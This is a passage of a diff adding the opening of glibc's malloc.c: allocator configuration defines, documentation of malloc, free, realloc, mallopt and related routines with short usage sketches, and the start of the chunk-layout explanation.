+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
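+
+/*
+  A minimal usage sketch, assuming the M_* constants from <malloc.h>
+  described in the table above (return value is 1 on success, 0 if the
+  value was rejected):
+
+    #include <malloc.h>
+
+    mallopt (M_MXFAST, 0);              disables fastbins entirely
+    mallopt (M_TRIM_THRESHOLD, -1);     effectively disables automatic trimming
+    mallopt (M_MMAP_MAX, 0);            never service requests via mmap
+*/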
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
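+
+/*
+  For example (a sketch; the field names are those listed above and all
+  fields are ints):
+
+    struct mallinfo mi = mallinfo ();
+    printf ("%d free chunks holding %d bytes; %d bytes in mmapped regions\n",
+            mi.ordblks, mi.fordblks, mi.hblkhd);
+*/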
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
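+
+/*
+  For example, after freeing a large working set a program might try:
+
+    if (malloc_trim (0))
+      puts ("returned some memory to the system");
+
+  Whether anything is actually released depends on the heap layout, as
+  described above.
+*/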
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
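+
+/*
+  A usage sketch for the POSIX interface declared above:
+
+    void *buf;
+    if (posix_memalign (&buf, 64, 4096) == 0)
+      {
+        ... use the 64-byte-aligned buffer ...
+        free (buf);
+      }
+
+  On failure the return value is an errno code (e.g. EINVAL, ENOMEM)
+  rather than -1, and errno is not set.
+*/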
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
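+
+/*
+  With the usual SIZE_SZ values this works out to 64 * 4 / 4 == 64 bytes
+  on 32-bit builds and 64 * 8 / 4 == 128 bytes on 64-bit builds, matching
+  the DEFAULT_MXFAST values quoted in the option summary above.
+*/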
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped pages the kernel simply
+  has no choice but to zero them.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
